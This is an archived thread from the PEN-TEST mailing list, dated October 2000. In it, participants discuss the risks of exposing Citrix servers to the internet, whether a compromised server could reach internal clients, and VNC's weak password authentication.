Penetration Testing mailing list archives
Re: [PEN-TEST] Citrix (and other remote-terminal madness)
From: "Beauregard, Claude Q" <CQBeauregard () AAAMICHIGAN COM>
Date: Wed, 11 Oct 2000 09:58:46 -0400
I'm not aware of anything unique about the CItrix ICA client that identifies it to the Citrix server. Has anyone tried to use the VNC client to access a Citrix server. Claude -----Original Message----- From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf Of Jay Mobley Sent: Tuesday, October 10, 2000 3:38 PM To: PEN-TEST () SECURITYFOCUS COM Subject: Re: [PEN-TEST] Citrix (and other remote-terminal madness) Keep in mind however that while VNC has pleanty of options in the way of protecting the data that is sent over the wire, its authentication mechinisms are lacking. Passwords are limited to 8 characters, and there is no protection against dictionary/brute force attacks, and there is a patch out for the client that allows you to do just that. By the way.. if anyone happens to have knowledge of the patch, I never could figure out where the code went... -Jay Mobley Interactive Explorers -----Original Message----- From: Dunker, Noah [mailto:NDunker () FISHNETSECURITY COM] Sent: Tuesday, October 10, 2000 9:03 AM To: PEN-TEST () SECURITYFOCUS COM Subject: Re: [PEN-TEST] Citrix (and other remote-terminal madness) If you're looking for a graphical remote-interface, you might try VNC. The Client is cross platform (Even works on MacOS and WinCE). The server works on all windows platforms, And source is available for UNIX Platforms, with binaries available for almost all popular flavors. It only allows keyboard and mouse. No file transfers or anything. On Win*, there can only one user at a time. On UNIX, VNC creates extended virtual X Window System Desktops, so multiple users can be logged into the same server at the same time... :0, :1, :2, etc... For silly things like Netscape, this will probably work fine. the Windows VNC client even supports "Full Screen Mode" where "windows" goes into the background, and the remote machine seems to be local. It works okay over a T1, and there have been multible enhancements to the VNC protocol that allow for encryption, higher levels of compression, etc... and VNC works great through a VPN or SSH tunnel. VNC can be grabbed from http://www.uk.research.att.com/vnc/, This version has no encryption that I know of... Do a search and you can probably find others... I typically just shove the protocol through OpenSSH. -----Original Message----- From: Peter Van Epp [mailto:vanepp () SFU CA] Sent: Tuesday, October 10, 2000 10:45 AM To: PEN-TEST () SECURITYFOCUS COM Subject: Re: Citrix
On Mon, 9 Oct 2000, Beauregard, Claude Q wrote:Has anyone done any penetration regarding Citrix and Internet access as provided by the Citrix servers to internal network resources. Even
though
they are now using 128bit encryption for the client the hole in the
firewall
is there waiting to be exploited.Can you elaborate what you see as a hole? Hugo.
While I'm not the original poster, I was (and to some extent still
am)
looking at this as a way to get "web" access in to a secure network. My
concern is that as I feared the link between the client and server is
apparantly
a full service link (i.e. it allows drive mounting from the server by the
client for instance). The application I'm interested in (and which sounds
like
what this person is doing) is to have the server out on the net, subject to
being broken in to like all NT devices but having nothing except video
commands
going in and key strokes coming out from the secure network. Thus a breakin
on the server doesn't compromise the internal secure network (as long as
confidential data is kept off of the Citrix server at least). The attacker
can
draw obcsene images on a single screen inside the secure network, but likely
(modulo bugs in the video drawing routines on the client side of course)
can't
take over the client machine and compromise the internal network. It looks
to me
from what little I have found out about the Citrix protocol that you would
need an application proxy type firewall to filter out all protocol elements
other than screen draw commands in and key strokes out before you could do
this safely. With things like file system mounting possible I expect that a
compromise of the server could also result in a compromise of the secure
network
that the client is part of by subverting the client.
This of course may not be possible if the protocol gets unhappy
about not being able to talk to the client except with video drawing
commands.
Peter Van Epp / Operations and Technical Support
Simon Fraser University, Burnaby, B.C. Canada
Current thread:
- Re: [PEN-TEST] Citrix (and other remote-terminal madness) Dunker, Noah (Oct 10)
- Re: [PEN-TEST] Citrix (and other remote-terminal madness) Kevin J. Menard, Jr. (Oct 10)
- <Possible follow-ups>
- Re: [PEN-TEST] Citrix (and other remote-terminal madness) Jay Mobley (Oct 10)
- Re: [PEN-TEST] Citrix (and other remote-terminal madness) Beauregard, Claude Q (Oct 11)